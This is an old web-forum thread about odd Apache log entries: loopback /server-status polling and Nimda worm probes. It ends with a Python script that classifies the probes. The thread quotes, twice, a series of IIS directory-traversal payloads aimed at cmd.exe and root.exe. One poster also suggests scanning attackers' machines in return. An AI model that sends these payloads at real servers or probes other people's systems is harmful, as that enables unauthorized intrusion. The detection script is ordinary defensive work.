strange contents in httpd log
kamprath
Junior Member
Join Date: Apr 2000
Location: San Francisco, CA
Jun 29, 2002, 04:43 PM
 
I have a (very) large number of the following log entries in my httpd access_log file:

127.0.0.1 - - [29/Jun/2002:13:35:27 -0700] "GET /server-status" 200 4327 "-" "-"

Does anybody know what and why they are?

TIA!
--
Michael F. Kamprath
     
Camelot
Mac Elite
Join Date: May 1999
Location: San Jose, CA
Jun 29, 2002, 09:37 PM
 
Originally posted by kamprath:
> I have a (very) large number of the following log entries in my httpd access_log file:
>
> 127.0.0.1 - - [29/Jun/2002:13:35:27 -0700] "GET /server-status" 200 4327 "-" "-"
>
> Does anybody know what and why they are?
>
> TIA!

The 127.0.0.1 at the beginning of the line indicates that the hits are coming from your own machine - presumably some watchdog process is monitoring Apache's status so that it will restart Apache should it crash.
Gods don't kill people - people with Gods kill people.
     
Kristoff
Mac Elite
Join Date: Sep 2000
Location: in front of the keyboard
Jun 30, 2002, 01:41 AM
 
You think that's strange???

You should see ol' Nimda at work...

cmd.exe??? Not on this OS

24.221.99.90 - - [25/Jun/2002:14:03:40 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:03:41 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:03:42 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:03:46 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:03:49 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:03:52 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:03:53 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:03:56 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 354 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:03:56 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:03:57 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:04:00 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:04:03 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:04:07 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 304 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:04:10 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 304 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:04:14 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:04:15 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"
signatures are a waste of bandwidth
especially ones with political tripe in them.
     
IUJHJSDHE
Mac Elite
Join Date: Aug 2001
Location: Australia
Jul 1, 2002, 01:54 AM
 
Originally posted by Kristoff:
> You think that's strange???
>
> You should see ol' Nimda at work...
>
> cmd.exe??? Not on this OS
>
> 24.221.99.90 - - [25/Jun/2002:14:03:40 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
> 24.221.99.90 - - [25/Jun/2002:14:03:41 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
> 24.221.99.90 - - [25/Jun/2002:14:03:42 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"
> 24.221.99.90 - - [25/Jun/2002:14:03:46 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"
> 24.221.99.90 - - [25/Jun/2002:14:03:49 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"
> 24.221.99.90 - - [25/Jun/2002:14:03:52 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338 "-" "-"
> 24.221.99.90 - - [25/Jun/2002:14:03:53 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338 "-" "-"
> 24.221.99.90 - - [25/Jun/2002:14:03:56 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 354 "-" "-"
> 24.221.99.90 - - [25/Jun/2002:14:03:56 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
> 24.221.99.90 - - [25/Jun/2002:14:03:57 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
> 24.221.99.90 - - [25/Jun/2002:14:04:00 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
> 24.221.99.90 - - [25/Jun/2002:14:04:03 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
> 24.221.99.90 - - [25/Jun/2002:14:04:07 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 304 "-" "-"
> 24.221.99.90 - - [25/Jun/2002:14:04:10 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 304 "-" "-"
> 24.221.99.90 - - [25/Jun/2002:14:04:14 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"
> 24.221.99.90 - - [25/Jun/2002:14:04:15 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"

Hehe, I hate those, but it's always funny looking at it from an apache log.

Hehe stupid windows
     
benbargagliotti
Junior Member
Join Date: Nov 2001
Jul 17, 2003, 01:35 AM
 
I was just about to post a question concerning those same log entries, from the nimda virus. I was wondering what those were. Should I ban IP addresses? Does it matter? Thanks

ben
     
C.J. Moof
Mac Elite
Join Date: Aug 2001
Location: Madison, WI
Jul 17, 2003, 02:08 PM
 
Originally posted by benbargagliotti:
> I was just about to post a question concerning those same log entries, from the nimda virus. I was wondering what those were. Should I ban IP addresses? does it matter? thanks
>
> ben

There's no point banning IP addresses. There's a fantastic number of machines on the net spewing out nimda and code red as we speak. If you're not running Windows systems, you can just disregard them - they're harmless noise to our boxes.

Here's what I say is fun - put on HenWen and get an alert up anytime any "bad" (user defined) traffic hits your machine. You'll be told the moment that code red/nimda, etc. try to get in, when you're port scanned, all sorts of info. You'll see the moment someone does a port scan, so you can pop up their IP and poke around their machine in return.
OS X: Where software installation doesn't require wizards with shields.
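
A log triage sketch for the two kinds of entries discussed in this thread, added here as an example and not part of any post: it separates loopback /server-status polling from the IIS-targeted probes and lists any probe that was not refused with a 4xx status. The function names and the 192.0.2.10 entry are constructed; the other sample lines are copied from the posts above.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Common/combined log format. The protocol token is optional because the
# /server-status entry in the thread was logged without one.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<uri>[^\s"]+)(?: [^"]*)?" (?P<status>\d{3}) '
)
# Executable names and traversal sequences seen in the probes quoted above.
PROBE_RE = re.compile(r'(?:cmd|root)\.exe|\.\.[\\/]', re.IGNORECASE)

def decode_fully(uri, max_rounds=4):
    """Percent-decode repeatedly, so %255c -> %5c -> backslash.
    Overlong forms such as %c0%af are not normalised here."""
    for _ in range(max_rounds):
        decoded = unquote(uri, encoding="latin-1")
        if decoded == uri:
            break
        uri = decoded
    return uri

def classify(line):
    """Return (kind, source_ip, status) or None for an unparseable line."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    uri = decode_fully(m["uri"])
    if m["ip"] in ("127.0.0.1", "::1") and uri.split("?")[0] == "/server-status":
        kind = "local-status-poll"
    elif PROBE_RE.search(uri):
        kind = "iis-probe"
    else:
        kind = "other"
    return kind, m["ip"], int(m["status"])

def summarize(lines):
    """Count entries per kind; collect probes that were NOT refused with 4xx."""
    kinds, answered = Counter(), []
    for line in lines:
        result = classify(line)
        if result is None:
            continue
        kinds[result[0]] += 1
        if result[0] == "iis-probe" and not 400 <= result[2] < 500:
            answered.append(line)
    return kinds, answered

SAMPLE = [  # first four lines are from the thread; the last one is constructed
    '127.0.0.1 - - [29/Jun/2002:13:35:27 -0700] "GET /server-status" 200 4327 "-" "-"',
    '24.221.99.90 - - [25/Jun/2002:14:03:40 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 299 "-" "-"',
    '24.221.99.90 - - [25/Jun/2002:14:03:49 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"',
    '24.221.99.90 - - [25/Jun/2002:14:04:10 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 304 "-" "-"',
    '192.0.2.10 - - [25/Jun/2002:14:05:00 -0700] "GET /index.html HTTP/1.0" 200 1024 "-" "-"',
]
```

An empty second return value from `summarize(SAMPLE)` means every probe in the sample was answered with a 4xx; a non-empty one lists the lines worth reading by hand.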
     